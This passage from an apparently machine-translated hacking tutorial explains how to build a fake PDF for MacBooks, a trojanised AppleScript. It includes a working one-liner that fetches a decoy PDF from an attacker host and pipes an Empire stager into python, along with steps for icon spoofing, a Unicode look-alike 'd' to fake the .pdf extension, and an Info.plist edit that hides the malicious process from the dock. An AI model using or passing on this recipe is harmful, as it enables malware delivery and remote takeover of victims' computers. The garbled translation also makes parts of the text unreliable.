With the macOS stager created and the attacker's system hosting the Empire listener, the malicious AppleScript can be created with some Unicode and Icon manipulation tricks and disguised as a legal PDF.
This requires a real PDF attack on the work. Files larger than 1 MB in size may be too large and may make the target suspicious. The real PDF is downloaded each time the target opens the trojanised AppleScript (the fake PDF), so the real PDF should be just one page and small enough to download it quickly, otherwise the target might wonder why it's a few Seconds lasts The PDF file will be previewed if it is to be displayed immediately.
In this follow-up to the first part of further creating a malicious PDF for MacBooks, I'll show you how to get started fast PDF created with the Cover of a CompTIA Study Guide on AllITebooks, but a higher quality image should be used during a real scenario  Step 1: Copy a PDF Cover Image
Navigate in your web browser to a site where the PDF file is cloned. In my example, this is the CompTIA study guide to AllITebooks. You do not really need to download the PDF file, you just need the first image to appear in the preview, so right-click on it, choose "Save Image As" and save it with the title . jpg into the directory files /
Step 2: Install GIMP and open the image
In Um To manipulate the title image of PDF, we need GIMP, a popular image editing application that is completely free. To install it, use the command apt-get below.
apt-get install gimp
Once installed, open cover.jpg in GIMP with the following command.
Step 3: Export the cover sheet as PDF
Next, export the image to the "files /" directory by navigating to "File" and then "Export As". Change the file name to real.pdf and the file type to "Portable Document Format (* .pdf)"
Apple Icons must be perfectly symmetrical squares and the cover.jpg is rectangular. To fix the problem, navigate to the Picture button in GIMP and then edit the Canvas Size.
Width to reach the Height and clicking on "Resize", to save the changes. The new screen shows a ton of transparent space on the right side of the picture. To center the image, use the Align tool under Tools, then Transform Tools.
Left-click once on the image to select it, and then click the Center button. , Note that the translucent area is now on both sides of the cover photo, as shown below.
Now resize the image by clicking Navigate "Image" then "Scale Image" and then change the width and Height in 256
Export the image again to the files / directory by navigating to "File", then "Export as." Change the file name to cover.png and the file type to "PNG Image (* .png)."
The final step for the images is to cover the cover .png in to convert Apple ICNS icon file format. To do this, you can upload the cover.png file to cloudconvert and click on the "Start conversion" button.
When the conversion is done, download the .icns file and save it in the files / directory. There should now be four files in the files / directory (you can do this with ls ).
`/ tokyoneon ~ / files > ls cover.icns cover.jpg cover.png real.pdf
The cover.jpg and cover.png were used as templates and are no longer needed. The real.pdf is a small PDF that is downloaded from the target each time the AppleScript (the fake PDF) is opened. The cover.icns is the Apple symbol file used in a later step.
That was & # 39; s for the Kali Linux end. To make the malicious AppleScript (fake PDF), I use the script editor in macOS High Sierra.
Step 8: Create the AppleScript
It should be possible to create trojanized AppleScripts with Kali, but it is a bit more involved than allowed in this article. To keep things simple, I use macOS with AppleScript version 2.7 and Script Editor version 2.10. If readers want a full Kali-Linux method, please leave a comment and I'll see what I can do.
First, copy the real PDF that is cloned to the macOS desktop. This allows the attacker to make a direct comparison when creating the forged PDF.
Then, look for Open Apple's built-in Spotlight, Launchpad, or Utilities folder under Applications "and copy the following script into the window. This is the single-line AppleScript that runs on the victim's MacBook when the fake PDF is double-clicked.
do shell script "s = ATTACKER IP ADDRESS: PORT; curl -s $ s / real.pdf | open -f -a Preview.app & curl -s $ s / script | python -"
- The start of the script ( do shell script ) is the AppleScript directing the MacBook to execute the program following code
- The server of the attacker is set as a variable ( s = ATTACKER -IP-ADDRESS: PORT ) and should be changed to the local IP address of the attacker. For example, s = 126.96.36.199: 8080 .
- The real PDF is downloaded ( curl -s $ s / real.pdf ) from the server of the attacker, piped ([ | ) and opened ( open -fa Preview.app ) with the macOS Preview application.
- Lastly, the Empire Stager, stored as a "script" on the attacker's server, is downloaded ( & curl -s $ s / script | python – ) and executed with Python on the victim's MacBook ,
Next, click "File" in the menu bar, then "Export" to start saving the AppleScript.
Exporting the desktop with the filename fake change the file format in "Application" and disable "Show startup screen".
Functionally speaking, the wrong P DF behaves as intended. But if you look at the two files side by side now, there is still a lot to do to make it look like the real PDF on the left.
As seen in GIF above, macOS becomes real for the file .pdf generally use the first page of PDF to generate the file icon. This can of course easily be faked with the previously created .icns. To change the icon, move the cover.icns file from the Kali system to the MacBook, right-click the fake file, and then choose "Get Info"
Then drag the cover.icns file into the Info window of fake to change the icon.
The AppleScript looks more like the real PDF. With a little patience, the crease in the top right corner of the icon, the outline of the icon, and the binder rings can be easily manipulated with GIMP and other photo editor tricks. The details of further spoofing the cover photo are a bit boring, so I'll keep going – you get the idea.
The bigger problem is the filename. Ideally, an AppleScript with a PDF file extension is desired. But changing the file extension to .pdf causes macOS to display the AppleScripts true file extension.
As shown above, macOS automatically appends the .app extension. One way to get a convincing file extension is to use Unicode, a character encoding standard that provides a unique number for each character.
Unicode "U + 1E0B" is the Latin lowercase letter D with a dot above it and at a glance appears just like a normal "d" character.
Copying this character from the Wikipedia page and pasting into the AppleScript filename produces a much more convincing file extension.
At a glance, this difference could easily be mistaken for a specification of dust. On closer examination, the difference in the Latin "d" can be seen more clearly.
This is just one of many available Unicode characters used for such extension spoofing attacks and other types
Do not miss: How to easily generate hundreds of phishing domains
Step 11: Hide the Python script from the dock
Another problem with using AppleScripts has occurred this way, showing the dock after running the script with two new items.
One icon stands for Preview to show the real PDF, the other icon represents the malicious Python script that appears in the Background was executed. To fix this, right-click on the file fake.pdf and then on "Show package contents".
Navigate to "Contents" directory and open the file "Info.plist" in TextEdit. Add the following NSUIElement text to the Info.plist file.
This is how it should look in TextEdit: